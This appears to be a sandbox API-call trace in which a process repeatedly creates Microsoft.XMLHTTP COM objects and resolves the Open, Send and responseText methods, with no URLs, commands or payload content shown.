	[0314.025] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0314.025] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0314.025] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0314.025] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0314.025] ??2@YAPEAX_K@Z () returned 0x62f310
	[0314.025] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f310) 
	[0314.025] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0314.025] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0314.025] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0314.025] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0314.025] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0314.025] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0314.028] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0314.028] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0314.028] SysStringLen (param_1=0x0) returned 0x0
	[0314.028] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0314.028] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0314.028] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c00) returned 0x0
	[0314.028] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0314.028] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c68) returned 0x0
	[0314.028] ??2@YAPEAX_K@Z () returned 0x62f330
	[0314.028] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c68, pUnkSite=0x62f330) 
	[0314.028] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0314.028] XMLHTTPRequest:IUnknown:Release (This=0x49c5c68) returned 0x0
	[0314.029] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c00) returned 0x0
	[0314.029] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c00) returned 0x3
	[0314.029] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0314.029] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0314.029] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0314.029] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0314.029] SysStringLen (param_1=0x0) returned 0x0
	[0314.029] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0314.029] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0314.029] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0314.029] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0314.029] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0314.029] ??2@YAPEAX_K@Z () returned 0x62f310
	[0314.029] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f310) 
	[0314.029] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0314.029] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0314.029] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0314.030] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0314.030] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0314.030] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0314.030] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0314.030] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0314.030] SysStringLen (param_1=0x0) returned 0x0
	[0314.030] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0314.030] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0314.030] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c60) returned 0x0
	[0314.030] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0314.030] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0314.030] ??2@YAPEAX_K@Z () returned 0x62f330
	[0314.030] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f330) 
	[0314.030] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0314.030] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0314.030] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c60) returned 0x0
	[0314.030] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c60) returned 0x3
	[0314.031] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0314.031] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c60, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0314.031] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c60, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0314.032] longjmp () 
	[0314.032] longjmp () 
	[0314.032] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0314.032] SysStringLen (param_1=0x0) returned 0x0
	[0314.032] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0314.033] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0314.033] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5bb0) returned 0x0
	[0314.033] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0314.033] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c18) returned 0x0
	[0314.033] ??2@YAPEAX_K@Z () returned 0x62f310
	[0314.033] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c18, pUnkSite=0x62f310) 
	[0314.033] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0314.033] XMLHTTPRequest:IUnknown:Release (This=0x49c5c18) returned 0x0
	[0314.033] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5bb0) returned 0x0
	[0314.033] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5bb0) returned 0x3
	[0314.033] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0314.033] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bb0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0314.033] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0314.033] longjmp () 
	[0314.033] longjmp () 
	[0314.033] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0314.034] SysStringLen (param_1=0x0) returned 0x0
	[0314.034] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0314.034] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0314.034] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0314.034] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0314.034] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0314.034] ??2@YAPEAX_K@Z () returned 0x62f330
	[0314.034] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f330) 
	[0314.034] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0314.034] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0314.034] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0314.034] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0314.034] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0314.034] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0314.034] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0314.034] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0314.035] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0314.035] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0314.232] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0314.232] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
